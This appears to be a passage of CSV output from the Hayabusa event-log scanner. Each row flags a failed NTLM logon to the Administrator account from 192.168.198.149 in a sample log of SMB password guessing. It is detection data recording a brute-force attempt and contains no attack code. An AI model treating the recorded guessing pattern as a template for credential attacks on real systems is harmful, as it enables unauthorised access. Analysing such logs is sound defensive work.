2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
